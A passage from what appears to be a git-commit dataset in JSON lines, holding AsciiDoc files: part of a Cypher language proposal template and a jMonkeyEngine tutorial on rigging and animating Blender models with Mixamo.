\u201cAnd\u201d\nRETURN a\n----\n\n[source, cypher]\n.Find all persons whose name starts with the parameter prefix\n----\nMATCH (a:Person) WHERE a.name STARTS WITH {prefix}\nRETURN a\n----\n\n[source, cypher]\n.Find all persons whose name ends with \"fan\"\n----\nMATCH (a:Person) WHERE a.name ENDS WITH \"fan\"\nRETURN a\n----\n\n[source, cypher]\n.Find all books whose isbn in string form contains \"007\"\n----\nMATCH (b:Book) WHERE toString(b.isbn) CONTAINS \"007\"\nRETURN a\n----\n\n=== Syntax\n\nProvide the full range of syntactic additions and modifications in EBNF (https:\/\/en.wikipedia.org\/wiki\/Extended_Backus-Naur_Form) format, along with explanatory text.\n\n_An example of this is shown below:_\n\n[source, ebnf]\n.Extend expressions to support string search operators\n----\nexpression = current definition of expression\n | string-search\n ;\n\nstring-search = starts with | ends with | contains ;\nstarts-with = expression, \"STARTS\", \"WITH\", expression ;\nends-with = expression, \"ENDS\", \"WITH\", expression ;\ncontains = expression, \"CONTAINS\" expression ;\n----\n\n=== Semantics\n\nProvide a description of the expected semantics of the new feature(s).\nUse subheadings to structure the content.\n\n_Examples are shown below in sections 3.3.1\u20133.3.3:_\n\n==== STARTS WITH\n\nUsing `lhs STARTS WITH rhs` requires both `lhs` and `rhs` to be strings. This new expression evaluates to true if `lhs` textually starts with `rhs`. Otherwise, it is false.\n\n==== ENDS WITH\n\nUsing `lhs ENDS WITH rhs` requires both `lhs` and `rhs` to be strings. This new expression evaluates to true if `lhs` textually ends with `rhs`. Otherwise, it is false.\n\n==== CONTAINS\n\nUsing `lhs CONTAINS rhs` requires both `lhs` and `rhs` to be strings.\nThis new expression evaluates to true if `lhs` textually contains `rhs`.\nOtherwise, it is false.\n\nIf any argument to `STARTS WITH`, `ENDS WITH`, or `CONTAINS` is `NULL`, then the result of evaluating the whole predicate is `NULL`.\n\nIt is a type error to use `STARTS WITH`, `ENDS WITH`, or `CONTAINS` with a value that is not a string.\n\n=== Interaction with existing features\n\nProvide details on any interactions that need to be considered.\n\n=== Alternatives\n\nList any alternatives here; e.g. new keywords, a smaller feature set etc.\n\n== What others do\n\nIf applicable, include a feature comparison table, along with any useful links.\n\nTo provide a well-rounded comparison, please ensure the inclusion of at least one SQL-based implementation -- such as DB2 or Postgres -- as well as SPARQL.\nIf you require any assistance or pointers to the latter, please contact petra.selmer@neotechnology.com.\n\n== Benefits to this proposal\n\nList the benefits here.\n\n== Caveats to this proposal\n\nList any caveats here.\nThese may include omissions, reasons for non-conformance with other features and so on.\n\n== Appendix\n\nPut any supplementary information here.\n","old_contents":":numbered:\n:toc:\n:toc-placement: macro\n\n= CIP<CCYY>-<MM>-<DD> - <The title of the CIP>\n\n*Author:* <Author name> <Author email>\n\n**_Guidelines:_**\n\n* **_Please use this template as a guide. To aid clarity and give an idea of what the pertinent section denotes, some headings have example text (in italics)._**\n\n* **_The file naming convention is 'CIP<CCYY>-<MM>-<DD>-short-title-words.adoc'._**\n\n* **_Label the pull request for the CIP with the correct Cypher vocabulary(ies)._**\n\n* **_The CIP may only consider Cypher language features. This means the CIP must make no mention of Neo4j._**\n\ntoc::[]\n\n== Abstract\n\nThis is a high-level summary of the aim and description of the CIP.\n\n== Motivation\n\nProvide the rationale and justification for the proposed feature(s).\n\n== Background\n\nThis is further background regarding the CIP, should it be required or deemed useful.\n\nPlease ensure that links to related documents (including other CIPs) are provided.\n\n== Proposal\n\nThis comprises the detail of the CIP, and is divided into the sub-sections below.\n\n=== Examples\n\nFor each aspect of the proposed feature(s), provide at least one Cypher example query to show how the feature is envisaged to work, along with explanatory text.\n\n*_Example:_* +\n_Find all persons whose name starts with \"And\"._\n\n----\nMATCH (a:Person) WHERE a.name STARTS WITH \u201cAnd\u201d\nRETURN a\n----\n\n_Find all persons whose name starts with the parameter prefix._\n\n----\nMATCH (a:Person) WHERE a.name STARTS WITH {prefix}\nRETURN a\n----\n\n_Find all persons whose name ends with \"fan\"._\n\n----\nMATCH (a:Person) WHERE a.name ENDS WITH \"fan\"\nRETURN a\n----\n\n_Find all books whose isbn in string form contains \"007\"._\n\n----\nMATCH (b:Book) WHERE toString(b.isbn) CONTAINS \"007\"\nRETURN a\n----\n\n=== Syntax\n\nProvide the full range of syntactic additions and modifications in EBNF (https:\/\/en.wikipedia.org\/wiki\/Extended_Backus-Naur_Form) format, along with explanatory text.\n\n*_Example:_* +\n_Extend expressions to support string search operators:_\n\n----\nexpression = current definition of expression\n | string-search\n ;\n\nstring-search = starts with | ends with | contains ;\nstarts-with = expression, \"STARTS\", \"WITH\", expression ;\nends-with = expression, \"ENDS\", \"WITH\", expression ;\ncontains = expression, \"CONTAINS\" expression ;\n----\n\n=== Semantics\n\nProvide a description of the expected semantics of the new feature(s).\n\n*_Example:_* +\n_STARTS WITH_\n\n_Using `lhs STARTS WITH rhs` requires both `lhs` and `rhs` to be strings. This new expression evaluates to true if `lhs` textually starts with `rhs`. Otherwise, it is false._\n\n_ENDS WITH_\n\n_Using `lhs ENDS WITH rhs` requires both `lhs` and `rhs` to be strings. This new expression evaluates to true if `lhs` textually ends with `rhs`. Otherwise, it is false._\n\n_CONTAINS_\n\n_Using `lhs CONTAINS rhs` requires both `lhs` and `rhs` to be strings. This new expression evaluates to true if `lhs` textually contains `rhs`. Otherwise, it is false._\n\n_If any argument to `STARTS WITH`, `ENDS WITH`, or `CONTAINS` is NULL, then the result of evaluating the whole predicate is NULL._\n\n_It is a type error to use `STARTS WITH`, `ENDS WITH`, or `CONTAINS` with a value that is not a string._\n\n=== Interaction with existing features\n\nDetail any interactions which need to be considered.\n\n=== Alternatives\n\nList any alternatives here; e.g. new keywords, a smaller feature set etc.\n\n== What others do\n\nIf applicable, include a feature comparison table, along with any useful links.\n\nTo provide a well-rounded comparison, please ensure the inclusion of at least one SQL-based implementation - such as DB2 or Postgres - as well as SPARQL. If you require any assistance or pointers to the latter, please contact petra.selmer@neotechnology.com.\n\n== Benefits to this proposal\n\nList the benefits here.\n\n== Caveats to this proposal\n\nList any caveats here. These may include omissions, reasons for non-conformance with other features and so on.\n\n== Appendix\n\nPut any supplementary information here.\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"89ed28188edcff8d3356f9794195d372533701b0","subject":"link to image","message":"link to image\n","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"docs\/modules\/tutorials\/pages\/how-to\/modeling\/blender\/mixamo.adoc","new_file":"docs\/modules\/tutorials\/pages\/how-to\/modeling\/blender\/mixamo.adoc","new_contents":"= Animating Blender Models With Mixamo\n:revnumber: 2.0\n:revdate: 2020\/07\/15\n\n\n\n== Using Mixamo For Model Animation\n\nWith very little effort, you can use Adobes Mixamo to fully animate your Blender models. Once you understand the process that is.\n\nThis guide requires:\n\n* link:https:\/\/www.blender.org\/download\/[Blender version 2.78c+] with its default settings. The exception being `Select With:`, under `menu:File[User Preferences > Input]` is set to `Left Click`.\n* Blender FBX file Importing and Exporting, enabled.\n* A Modest amount of Blender knowledge.\n* A link:https:\/\/www.mixamo.com\/[Mixamo] account.\n\n\n== Prepare to Export\n\nTo properly animate your models there are a few rules you should follow.\n\n* Read the link:https:\/\/helpx.adobe.com\/creative-cloud\/faq\/mixamo-faq.html[Common Questions] guide before you do anything else.\n* Clean up your Blender file prior to exporting. This means you have a game ready model that will become the base for all your animations. Do this in a copy of your file so you have the original as a backup. The following checklist is provided for your convenience.\n[%interactive]\n- [ ] You have no Animations.\n- [ ] You have applied a triangulate modifier. Some exporters other than Ogre, have an option to apply the modifier on export. This would be the preferred method.\n- [ ] You have UV Mapped your model. It isn't required by Mixamo, just for loading your models into jme.\n- [ ] Your models origin is at the base of the mesh.\n- [ ] You have your materials and textures done for your model. It isn't required by Mixamo, just for loading your model into jme.\n - [ ] You have xref:jme3\/external\/blender\/blender_buffer_clearing.adoc[cleared your buffers]. It isn't required by Mixamo, just makes your models cleaner for jme.\n- [ ] You have applied the Location, Rotation, and Scale to your model.\n- [ ] *MOST IMPORTANT OF ALL*, in the `menu:Properties Panel[Scene Tab > Units Panel]` set the btn:[Unit of Measure] to Meters and the Length to Metric. Adobe uses centimeters for the FBX exporter and if this is not set the models scale will be unusual to say the least. JME3 uses 1 WU = whatever you determine but meters will make things easier for all aspects of your modeling. If you are doing this now, you may have to re-scale your model before proceeding.\n\n[TIP]\n====\nSee xref:jme3\/external\/blender.adoc[Creating assets in Blender3D] for help on creating jME3 compatible models.\n====\n\n== Blender FBX Export\n\n\n. In the `3d Viewport`, select your model, it will be high-lighted in orange.\n. In the `Info` header, select `menu:File[Export > FBX]`.\n. Enter a file path to export to, usually the same folder as your `.blend` file for simplicity.\n. Enter a file name.\n. In the `Export FBX` panel, located in the bottom left of the export dialog:\nMain Tab::\n- [x] Selected Objects\n- Scale = 1\n+\n[IMPORTANT]\n====\nClick the button next to scale to deselect btn:[Scale all data]. Failure to do so will destroy the scale of your model. If the button is selected, it will be dark in color.\n====\n\n- Forward = -Z Forward\n- Up = Y Up\n- Which kind of object to export = Mesh\nGeometries Tab::\n- [x] Apply Modifiers\n. When you are done, click the btn:[Export FBX] button to export the file.\n\n[TIP]\n====\nYou can save these FBX export settings by clicking the btn:[+] button next to btn:[Operator Presets].\n====\n\n\n== Mixamo FBX Import\n\n\n. Create an link:https:\/\/www.mixamo.com\/#\/[Mixamo] account and login.\n. From the `Default Character` panel, select `Upload Character`.\n. Navigate to the file to be uploaded or drag and drop it onto the file up-loader.\n. Select `Open`.\n\n[NOTE]\n====\nGenerally, if at any time during the import and rigging process the model does not appear within the time specified in the dialog that is showing, something has gone wrong and you will have to restart the process over.\n====\n\n== Mixamo Auto-Rigger\n\n\nIf everything went well the `Auto-Rigger` will open and your model will be facing you. If not, fix your model in Blender before proceeding.\n\n. If the model is facing you, click btn:[Next].\n. In this panel you will rig your model. Place the markers as shown in the Auto-Rigger dialog image.\n+\n[NOTE]\n====\nRemember that the model is facing you so its right is on your left.\n====\n\n. Select the LOD you are after. This is based off how many bones you want the hand of the model to have. Feel free to cycle through the options to see what each one does.\n. When you are through click the btn:[Next] button to rig your model.\n. When the model appears, if satisfied with the results, click `Finish`.\n\n\n== Mixamo Animations\n\n\n. In the far right panel select btn:[Find Animations].\n. After deciding on an animation, click the animation to have it applied to your model.\n. After the animation is applied to your model, toggle the btn:[In Place] checkbox if it's a moving animation.\n+\n[TIP]\n====\nYou can make small adjustments to the animation by using the sliders. The most common adjustment you will make is the `Character Arm-Space`. If you find the models hands are clipping through the model then use this slider to remedy the situation.\n====\n\n. When satisfied with the animation, select the btn:[Download] button and follow the `Mixamo Download` instructions below.\n\nIf you wish to add more animations, after the download, remove the animation by clicking on the btn:[X] button located next to the animations name. Add your new animation and when satisfied, download the new animation. Repeat as often as is neccessary.\n\n\n== Mixamo Download\n\n\nWhen downloading `*Animations*` from Mixamo:\n\n. Make sure the btn:[In Place] checkbox is selected if it's a moving animation.\n. In the `Download Settings` dialog use the default settings.\n* Format = FBX\n* Skin = With Skin\n* Frames per second = 30\n* Keyframe Reduction = none\n. Click btn:[Download] and save it to your computer.\n\nWhen downloading `*Characters*` from Mixamo:\n\n. In the `Download Settings` dialog the `Format` is FBX and `Pose` is TPose.\n. Click btn:[Download] and save it to your computer.\n\n\n== Creating Blender Animations\n\nDownload your TPose model using the instructions for downloading `*Characters*` given above. We will use it as our newly rigged model for Blender. To keep things organized we will create a `.blend` file for every animation and later use a separate `.blend` file to combine all animations into one jME3 compatible animation.\n\nThe following steps apply to any animation you want to add in the future.\n\n. Start Blender if it is not already open.\n. In the `Info` header, at the top of the program, select `menu:File[New > Reload Startup]`.\n. Select the default cube and delete it.\nScene Tab::\n* In the `Properties` panel, located at the bottom right, select the `Scene` tab.\n* In the `Units` panel, change the `Units of measure` to `Meters` and `Length` to `Metric`. You must *always* have these settings when importing from or exporting to Mixamo.\n+\n[TIP]\n====\nYou should create and save a default startup file in Blender. `menu:File[Save Startup File]`. This way you will not have to constantly redo things. Setting your `Units of measure` is the least you should do. You can always restore the default startup file by selecting `menu:File[Load Factory Settings]` at any time.\n====\n\n. In the `Info` header, select `menu:File[Import > FBX]`.\n. Select the FBX file you downloaded earlier.\n. In the `Import Fbx` panel located at the bottom left of the import dialog, leave all settings at their defaults.\nMain::\n- Scale = 1\n- [x] Import Normals\n- [x] Import Animations\n- Armature offset = 1\n- [x] Image Search\n- Decal offset = 0\n- [x] Use pre\/post rotation\nArmatures::\n- Nothing checked\n. When ready click btn:[Import FBX].\n. After Blender imports the file, both the armature and model are selected, in this order, select `menu:Object[Apply > Rotation]`. Repeat this for the `Location` and `Scale`. Alternatively, select the armature and model individually and repeat the process.\n. Select the Armature.\n. In the `Timeline`, determine the Length of the animation by btn:[RMB] selecting the last keyframe in the timeline. +\n Set `End:` to this value.\n. Click the btn:[|xref:] button to reset timeline back to the first frame.\n. In the `Info` header, change the `Default` screen layout to `Animation`.\n. In the `Dope Sheet Editor`, change the `Dope Sheet` mode\/context to `Action Editor`. The `Linked Action` will now show the action name of the animation you imported.\n. Rename this to the name of the imported animation. In this instance it was TPose.\n.\u00a0 Select the btn:[F] button to save the action.\n.\u00a0 Save your file with the same name as the action.\n\n[NOTE]\n====\nMixamo sets the rotation mode of bones to `Quaternion` as is appropriate for preventing link:https:\/\/en.wikipedia.org\/wiki\/Gimbal_lock[`Gimbal Lock`]. Keep this in mind if you decide to modify your animation. Blender defaults to `XYZ Euler` so you will need to change this setting prior to inserting new keyframes.\n====\n\n== Creating The Rigged Animation File\n\n\nIt's good practice to have a separate file for combining animations. Things can go wrong, animations may change, and you don't want to destroy your original model file by accident. Our plan of attack has been we create a .blend file for every animation and then use this separate rigged file to combine them into one. To keep it simple we will use a copy of the first animation we downloaded and created a `.blend` file for.\n\nYou create a rigged animation file only one time per model.\n\n. If you have closed the TPose.blend file, open it. In the `Info` header select `menu:File[Save As]` and save the file using the models name with the word `Rigged` added. This will be the only file we add animations to, for this model, from now on. It has our default TPose action which will allow us to start our animation track for `Ogre` animation exporting.\n. Select your `Armature`.\nObject Tab::\n.. In the `Properties` panel, navigate to the `Object` tab. In the `Display` panel toggle `X-Ray` on.\n. With your mouse inside the `3d Viewport`, press kbd:[Num Pad 1] followed by kbd:[Numpad 5].\n. kbd:[Tab] into `Edit Mode`.\n. Set the `3d Cursor` to the models origin.\n. Select `menu:Add[Single Bone]`.\n+\n[IMPORTANT]\n====\nThe models origin and the `Root` bone origin must be at the same location.\n====\n\n. Scale the bone down or up as needed by selecting the `Tip` (ball at the narrowest part of the bone) and dragging the `Z` arrow (blue arrow) of the manipulator up or down until you are satisfied with its scale. *DO NOT CHANGE THE ANGLE OR MOVE THE BASE OF THE BONE FROM CENTER*.\n. When satisfied with the scale, select the body of the bone to select the entire bone.\nBone Tab::\n.. In the `Properties` panel, navigate to the `Bone` tab.\n.. Rename the bone to `Root`.\n.. Deselect the `Deform` panel checkbox.\n. In the `3d Viewport`, select the body of the armatures `Hip` bone, the lowest bone in the center of the armature, to select the entire bone.\n. While holding kbd:[Shift] down, btn:[LMB] select the `Root` bone.\n. Press kbd:[Ctrl] + kbd:[P].\n. In the `Make Parent` dialog choose `Keep Offset`.\n. With the mouse inside the 3d Viewport, kbd:[Tab] out of `Edit Mode`.\n. Select your model.\nData Tab::\n.. In the `Properties` panel, navigate to the `Data` tab and make sure the `Mesh` has the same name as your model.\nMaterial Tab::\n.. In the `Properties` panel, navigate to the `Material` tab and make sure there is one `Material` in the `Material List` and it is the same name as your model.\n.. In the `Transparency` panel, move the `Alpha` slider to 1.\n+\n[IMPORTANT]\n====\nThere appears to be a bug where the FBX importer adds an `Alpha` map texture to your model. If the `Alpha` slider is not at one, and you use the Blender importer of the SDK, or convert a .blend file, it will be transparent. `Ogre` export is unaffected.\n====\n\n.. Deselect the checkbox of the `Transparency` panel.\nTexture Tab::\n.. In the `Properties` panel, navigate to the `Texture` tab, you will note that your texture has duplicate names in the `Texture List`. The bottom texture is actually a transparent `Alpha` texture and appears to be a bug. Select the *second* texture in the `*Texture List*` to highlight it.\n.. While holding down the kbd:[Shift] key, press the btn:[X] button next to the `*Texture Data Block*` to delete it.\n.. Select your remaining texture in the `Texture List` to highlight it. You will note the `Texture Data Block` is now red due to no texture being assigned.\n.. Click on the btn:[Browse Texture to be linked] button next to the `Texture Data Block` and select your texture.\n.. In the `Image` panel, click the btn:[Small Box] button located next to your texture's path to pack the image file.\n. In the `Info` header, change the layout from `Animation` to `UV Editing`.\n. With your mouse inside the `3d Viewport` and the model still selected, kbd:[Tab] into edit mode. If your model is not completely orange press kbd:[A] untill all vertices are selected. You will see your UV Mapped mesh appear in the `UV Image Editor` window.\n. In the `UV Image Editor`, click the btn:[Browse Image to be linked] button and select your UV image.\n. kbd:[Tab] out of `Edit Mode`.\n. In the `Info` header, change the layout from `UV Editing` to `Default` and then click the btn:[+] button to create a new layout.\n. Rename this new layout `NLA Editing`.\n. Click the `Current Editor Type` button, located at the bottom left (small box) of the `3d Viewport`, and change it from `3d View` to `NLA Editor`. Our TPose action is now visible.\n+\nNOTE: If the action is not visible, navigate to the `Dope Sheet Editor` and from the `Action Editor` context, select the `Action`.\n\n. Click the icon:angle-double-down[] button to push the action down into the stack.\n. Beneath the TPose strip you will see a slider. Drag this slider to the right until your strip is nested up against the left margin of the window.\n. Save your file.\n\n\n== Export\n\n\nYour rigged file is now ready to export. Export your model using one of the xref:jme3\/features#supported-external-file-types,Supported External File Types] of your choice.\n\n\n== Appending Blender Animations\n\nFollow the directions for xref:jme3\/advanced\/mixamo.adoc#mixamo-animations.adoc[Mixamo Animations], xref:jme3\/advanced\/mixamo.adoc#mixamo-download.adoc[Mixamo Download], xref:jme3\/advanced\/mixamo.adoc#creating-blender-animations.adoc[Creating Blender Animations], xref:jme3\/external\/blender.adoc#action-baking[Blender Action Baking] and xref:jme3\/external\/blender\/blender_buffer_clearing#the-linked-action-buffer,Clearing The Linked Action Buffer] for all animations you wish to append to your *rigged* animation file.\n\n. If your `Rigged` file is closed, open it.\n. From the `Info` header, change the Layout to `Default`.\n. In the `3d Viewport`, select the armature of the model.\n. From the `Info` header, select `menu:File[Append]`.\n. Navigate to, and select the `.blend` animation file you want to append.\n. From the folders list select the `Action` folder, followed by your action.\n. When ready, select the btn:[Append From Library] button to finalize your selection.\n. From the `Info` header, change your layout to `Animation`.\n. In the `Dope Sheet Editor`, change the context to `Action Editor` if not already selected.\n. Click the btn:[Action to be linked] button and select your append action from the list.\n. Select the btn:[F] button to save the action.\n. From the `Info` header, change the layout from `Animation` to the `NLA Editing` layout we created in the xref:jme3\/advanced\/mixamo.adoc#creating-the-rigged-animation-file.adoc[Creating The Rigged Animation File] section of this tutorial. You will see your append `Action` at the top of the list.\n. From the `NLA Editor` header, select `menu:Add[Add Tracks]`. A new track has now been added to the top of the list.\n. Click the icon:angle-double-down[] button next to the `Action` to push it down into the stack.\n. btn:[LMB] select the strip to make it the only strip selected.\n. btn:[LMB] drag the selected strip to the right until there is at least a 4 keyframe gap between the furthest strip to the right in the list and the append strip you are dragging.\n+\n[TIP]\n====\nWhen the strip is in drag mode it will be purple. While in drag mode you do not need to keep the btn:[LMB] pressed.\n====\n\n. When you are satisfied with the position, btn:[LMB] click the strip to finalize your selection. Your append strip should now be the furthest strip to the right in the list.\n+\n[TIP]\n====\nYou can use the mouse scroll wheel to shrink or expand the strip window to bring all strips into the view.\n\nYou can drag the slider, at the bottom of the strip window, to the right or left to position the strips against the side of the window.\n====\n\n. With the mouse inside the strip window, press the kbd:[N] key to open the properties window.\n. In the `Active Strip` panel, under `Strip Extents`, you will see the `End Frame` number. In the `Timeline`, set `End:` to this number. Every time you append an `Action` you must increase this number to equal the total length off all strips combined, including the gaps between strips.\n. Save your file.\n\nYour file is now ready to xref:jme3\/advanced\/mixamo#export,export].\n\n[IMPORTANT]\n====\nPrior to export:\n\nIn the `NLA Editor` make sure no `Actions` are waiting to be pushed down into the stack. If there are, it must be removed or made into a strip prior to export.\n\nIn the `Dope Sheet Editor` make sure no `Actions` are selected in the `Action Editor` context. If one is selected, it will be sitting at the top of the `NLA Editor` stack.\n\nAn `Action` that has not been pushed down into the `NLA Stack` will block your `NLA Strip` from playing.\n\nSome export methods bake your actions automatically on export, others don't. Test the animation in-game and if your animations are all messed up, try xref:jme3\/external\/blender.adoc#action-baking[baking them] or use a different exporter.\n====\n\nYour NLA strip should look something like this:\n\nimage::how-to\/modeling\/blender\/MixamoNLA.png[MixamoNLA.png,width=\"\",height=\"\"]\n\n\n== Notes\n\n\n* You can see a similar video demonstration of this entire process in xref:jme3.adoc#animations-and-scenes.adoc[Animations And Scenes] under the CadNav icon:long-arrow-right[] Mixamo icon:long-arrow-right[] JME Workflow heading.\n* See xref:tutorials:beginner\/hello_animation.adoc[Hello Animation] and xref:jme3\/advanced\/animation.adoc[Animation in JME3] to learn how to use your animated model.\n","old_contents":"= Animating Blender Models With Mixamo\n:revnumber: 2.0\n:revdate: 2020\/07\/15\n\n\n\n== Using Mixamo For Model Animation\n\nWith very little effort, you can use Adobes Mixamo to fully animate your Blender models. Once you understand the process that is.\n\nThis guide requires:\n\n* link:https:\/\/www.blender.org\/download\/[Blender version 2.78c+] with its default settings. The exception being `Select With:`, under `menu:File[User Preferences > Input]` is set to `Left Click`.\n* Blender FBX file Importing and Exporting, enabled.\n* A Modest amount of Blender knowledge.\n* A link:https:\/\/www.mixamo.com\/[Mixamo] account.\n\n\n== Prepare to Export\n\nTo properly animate your models there are a few rules you should follow.\n\n* Read the link:https:\/\/helpx.adobe.com\/creative-cloud\/faq\/mixamo-faq.html[Common Questions] guide before you do anything else.\n* Clean up your Blender file prior to exporting. This means you have a game ready model that will become the base for all your animations. Do this in a copy of your file so you have the original as a backup. The following checklist is provided for your convenience.\n[%interactive]\n- [ ] You have no Animations.\n- [ ] You have applied a triangulate modifier. Some exporters other than Ogre, have an option to apply the modifier on export. This would be the preferred method.\n- [ ] You have UV Mapped your model. It isn't required by Mixamo, just for loading your models into jme.\n- [ ] Your models origin is at the base of the mesh.\n- [ ] You have your materials and textures done for your model. It isn't required by Mixamo, just for loading your model into jme.\n - [ ] You have xref:jme3\/external\/blender\/blender_buffer_clearing.adoc[cleared your buffers]. It isn't required by Mixamo, just makes your models cleaner for jme.\n- [ ] You have applied the Location, Rotation, and Scale to your model.\n- [ ] *MOST IMPORTANT OF ALL*, in the `menu:Properties Panel[Scene Tab > Units Panel]` set the btn:[Unit of Measure] to Meters and the Length to Metric. Adobe uses centimeters for the FBX exporter and if this is not set the models scale will be unusual to say the least. JME3 uses 1 WU = whatever you determine but meters will make things easier for all aspects of your modeling. If you are doing this now, you may have to re-scale your model before proceeding.\n\n[TIP]\n====\nSee xref:jme3\/external\/blender.adoc[Creating assets in Blender3D] for help on creating jME3 compatible models.\n====\n\n== Blender FBX Export\n\n\n. In the `3d Viewport`, select your model, it will be high-lighted in orange.\n. In the `Info` header, select `menu:File[Export > FBX]`.\n. Enter a file path to export to, usually the same folder as your `.blend` file for simplicity.\n. Enter a file name.\n. In the `Export FBX` panel, located in the bottom left of the export dialog:\nMain Tab::\n- [x] Selected Objects\n- Scale = 1\n+\n[IMPORTANT]\n====\nClick the button next to scale to deselect btn:[Scale all data]. Failure to do so will destroy the scale of your model. If the button is selected, it will be dark in color.\n====\n\n- Forward = -Z Forward\n- Up = Y Up\n- Which kind of object to export = Mesh\nGeometries Tab::\n- [x] Apply Modifiers\n. When you are done, click the btn:[Export FBX] button to export the file.\n\n[TIP]\n====\nYou can save these FBX export settings by clicking the btn:[+] button next to btn:[Operator Presets].\n====\n\n\n== Mixamo FBX Import\n\n\n. Create an link:https:\/\/www.mixamo.com\/#\/[Mixamo] account and login.\n. From the `Default Character` panel, select `Upload Character`.\n. Navigate to the file to be uploaded or drag and drop it onto the file up-loader.\n. Select `Open`.\n\n[NOTE]\n====\nGenerally, if at any time during the import and rigging process the model does not appear within the time specified in the dialog that is showing, something has gone wrong and you will have to restart the process over.\n====\n\n== Mixamo Auto-Rigger\n\n\nIf everything went well the `Auto-Rigger` will open and your model will be facing you. If not, fix your model in Blender before proceeding.\n\n. If the model is facing you, click btn:[Next].\n. In this panel you will rig your model. Place the markers as shown in the Auto-Rigger dialog image.\n+\n[NOTE]\n====\nRemember that the model is facing you so its right is on your left.\n====\n\n. Select the LOD you are after. This is based off how many bones you want the hand of the model to have. Feel free to cycle through the options to see what each one does.\n. When you are through click the btn:[Next] button to rig your model.\n. When the model appears, if satisfied with the results, click `Finish`.\n\n\n== Mixamo Animations\n\n\n. In the far right panel select btn:[Find Animations].\n. After deciding on an animation, click the animation to have it applied to your model.\n. After the animation is applied to your model, toggle the btn:[In Place] checkbox if it's a moving animation.\n+\n[TIP]\n====\nYou can make small adjustments to the animation by using the sliders. The most common adjustment you will make is the `Character Arm-Space`. If you find the models hands are clipping through the model then use this slider to remedy the situation.\n====\n\n. When satisfied with the animation, select the btn:[Download] button and follow the `Mixamo Download` instructions below.\n\nIf you wish to add more animations, after the download, remove the animation by clicking on the btn:[X] button located next to the animations name. Add your new animation and when satisfied, download the new animation. Repeat as often as is neccessary.\n\n\n== Mixamo Download\n\n\nWhen downloading `*Animations*` from Mixamo:\n\n. Make sure the btn:[In Place] checkbox is selected if it's a moving animation.\n. In the `Download Settings` dialog use the default settings.\n* Format = FBX\n* Skin = With Skin\n* Frames per second = 30\n* Keyframe Reduction = none\n. Click btn:[Download] and save it to your computer.\n\nWhen downloading `*Characters*` from Mixamo:\n\n. In the `Download Settings` dialog the `Format` is FBX and `Pose` is TPose.\n. Click btn:[Download] and save it to your computer.\n\n\n== Creating Blender Animations\n\nDownload your TPose model using the instructions for downloading `*Characters*` given above. We will use it as our newly rigged model for Blender. To keep things organized we will create a `.blend` file for every animation and later use a separate `.blend` file to combine all animations into one jME3 compatible animation.\n\nThe following steps apply to any animation you want to add in the future.\n\n. Start Blender if it is not already open.\n. In the `Info` header, at the top of the program, select `menu:File[New > Reload Startup]`.\n. Select the default cube and delete it.\nScene Tab::\n* In the `Properties` panel, located at the bottom right, select the `Scene` tab.\n* In the `Units` panel, change the `Units of measure` to `Meters` and `Length` to `Metric`. You must *always* have these settings when importing from or exporting to Mixamo.\n+\n[TIP]\n====\nYou should create and save a default startup file in Blender. `menu:File[Save Startup File]`. This way you will not have to constantly redo things. Setting your `Units of measure` is the least you should do. You can always restore the default startup file by selecting `menu:File[Load Factory Settings]` at any time.\n====\n\n. In the `Info` header, select `menu:File[Import > FBX]`.\n. Select the FBX file you downloaded earlier.\n. In the `Import Fbx` panel located at the bottom left of the import dialog, leave all settings at their defaults.\nMain::\n- Scale = 1\n- [x] Import Normals\n- [x] Import Animations\n- Armature offset = 1\n- [x] Image Search\n- Decal offset = 0\n- [x] Use pre\/post rotation\nArmatures::\n- Nothing checked\n. When ready click btn:[Import FBX].\n. After Blender imports the file, both the armature and model are selected, in this order, select `menu:Object[Apply > Rotation]`. Repeat this for the `Location` and `Scale`. Alternatively, select the armature and model individually and repeat the process.\n. Select the Armature.\n. In the `Timeline`, determine the Length of the animation by btn:[RMB] selecting the last keyframe in the timeline. +\n Set `End:` to this value.\n. Click the btn:[|xref:] button to reset timeline back to the first frame.\n. In the `Info` header, change the `Default` screen layout to `Animation`.\n. In the `Dope Sheet Editor`, change the `Dope Sheet` mode\/context to `Action Editor`. The `Linked Action` will now show the action name of the animation you imported.\n. Rename this to the name of the imported animation. In this instance it was TPose.\n.\u00a0 Select the btn:[F] button to save the action.\n.\u00a0 Save your file with the same name as the action.\n\n[NOTE]\n====\nMixamo sets the rotation mode of bones to `Quaternion` as is appropriate for preventing link:https:\/\/en.wikipedia.org\/wiki\/Gimbal_lock[`Gimbal Lock`]. Keep this in mind if you decide to modify your animation. Blender defaults to `XYZ Euler` so you will need to change this setting prior to inserting new keyframes.\n====\n\n== Creating The Rigged Animation File\n\n\nIt's good practice to have a separate file for combining animations. Things can go wrong, animations may change, and you don't want to destroy your original model file by accident. Our plan of attack has been we create a .blend file for every animation and then use this separate rigged file to combine them into one. To keep it simple we will use a copy of the first animation we downloaded and created a `.blend` file for.\n\nYou create a rigged animation file only one time per model.\n\n. If you have closed the TPose.blend file, open it. In the `Info` header select `menu:File[Save As]` and save the file using the models name with the word `Rigged` added. This will be the only file we add animations to, for this model, from now on. It has our default TPose action which will allow us to start our animation track for `Ogre` animation exporting.\n. Select your `Armature`.\nObject Tab::\n.. In the `Properties` panel, navigate to the `Object` tab. In the `Display` panel toggle `X-Ray` on.\n. With your mouse inside the `3d Viewport`, press kbd:[Num Pad 1] followed by kbd:[Numpad 5].\n. kbd:[Tab] into `Edit Mode`.\n. Set the `3d Cursor` to the models origin.\n. Select `menu:Add[Single Bone]`.\n+\n[IMPORTANT]\n====\nThe models origin and the `Root` bone origin must be at the same location.\n====\n\n. Scale the bone down or up as needed by selecting the `Tip` (ball at the narrowest part of the bone) and dragging the `Z` arrow (blue arrow) of the manipulator up or down until you are satisfied with its scale. *DO NOT CHANGE THE ANGLE OR MOVE THE BASE OF THE BONE FROM CENTER*.\n. When satisfied with the scale, select the body of the bone to select the entire bone.\nBone Tab::\n.. In the `Properties` panel, navigate to the `Bone` tab.\n.. Rename the bone to `Root`.\n.. Deselect the `Deform` panel checkbox.\n. In the `3d Viewport`, select the body of the armatures `Hip` bone, the lowest bone in the center of the armature, to select the entire bone.\n. While holding kbd:[Shift] down, btn:[LMB] select the `Root` bone.\n. Press kbd:[Ctrl] + kbd:[P].\n. In the `Make Parent` dialog choose `Keep Offset`.\n. With the mouse inside the 3d Viewport, kbd:[Tab] out of 